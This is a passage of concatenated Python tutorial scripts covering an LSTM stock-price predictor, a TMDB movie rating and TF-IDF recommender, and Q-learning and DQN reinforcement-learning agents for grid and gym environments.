# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
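# illustrative sketch (not executed here): a hypothetical call building a small
# 2-layer regressor for sequences with 5 features per timestep; units/dropout are arbitrary
# example_model = create_model(input_length=5, units=64, n_layers=2, dropout=0.3)
# example_model.summary()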
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
# make sure the passed feature columns are in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
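# illustrative sketch (not executed here, since it would download data): a minimal call,
# assuming the usual yahoo_fin column names such as 'adjclose' and 'volume'
# data = load_data("AAPL", n_steps=60, lookup_step=1, shuffle=False,
#                  price_column='adjclose', feature_columns=['adjclose', 'volume'])
# print(data['X_train'].shape, data['y_train'].shape)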
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
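# quick sanity check of the helpers above (illustrative, with made-up prices):
# classify(100.0, 105.0) -> 1 (price went up, a "buy")
# classify(100.0, 95.0)  -> 0 (price went down, a "sell")
# shift(np.array([1.0, 2.0, 3.0, 4.0]), -1) -> array([ 2.,  3.,  4., nan])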
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
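# illustrative check of the IMDB-style weighted rating WR = v/(v+m)*R + m/(m+v)*C
# for a hypothetical movie with 500 votes averaging 8.2, using the m and C computed above
example_v, example_R = 500, 8.2
print("example weighted rating:", (example_v / (example_v + m)) * example_R + (m / (m + example_v)) * C)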
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
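# illustrative sketch: one common next step is to score overviews against each other;
# here we only compare the first movie to all others to keep the computation small
from sklearn.metrics.pairwise import cosine_similarity
sims = cosine_similarity(tfv_matrix[0], tfv_matrix).flatten()
most_similar = sims.argsort()[::-1][1:6]  # skip the movie itself
print("Movies with overviews most similar to", movies['original_title'].iloc[0])
print(movies['original_title'].iloc[most_similar])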
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for different events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # exploration probability (0 here means the agent always exploits); it is multiplied by EPSILON_DECAY every episode
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
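# e.g. with GRID_SIZE = 10 a relative offset of (-3, 5) becomes (6, 14):
# every delta in [-9, 9] is shifted into [0, 18] so it can index q_table directly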
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
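# equivalent form: Q(s,a) <- Q(s,a) + LEARNING_RATE * (reward + DISCOUNT * max_future_q - Q(s,a))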
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
action = np.argmax(q_table[state])
state, reward, done, info = env.step(action)
env.render()
time.sleep(0.2)
os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 20_000
MIN_REPLAY_MEMORY = 1_000
SHOW_EVERY = 50
RENDER_EVERY = 100
LEARN_EVERY = 50
GRID_SIZE = 20
ACTION_SIZE = 9
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, size):
self.SIZE = size
self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3) # 4
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player-self.food) + (self.player-self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player-self.food) + (self.player-self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
done = True
elif self.player == self.food:
reward = self.FOOD_REWARD
done = True
else:
reward = -self.MOVE_PENALTY
if self.episode_step < 200:
done = False
else:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # start an RGB array of our grid size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # set the food location tile to green
env[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N] # set the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # set the player tile to blue
img = Image.fromarray(env, 'RGB') # build the image; cv2.imshow() treats the array as BGR, so the colour tuples above render as named
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
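# Bellman target from the frozen target network: reward + gamma * max_a' Q_target(next_state, a')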
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# force CPU instead of GPU (comment these lines out to use the GPU)
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# force CPU instead of GPU (comment these lines out to use the GPU)
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
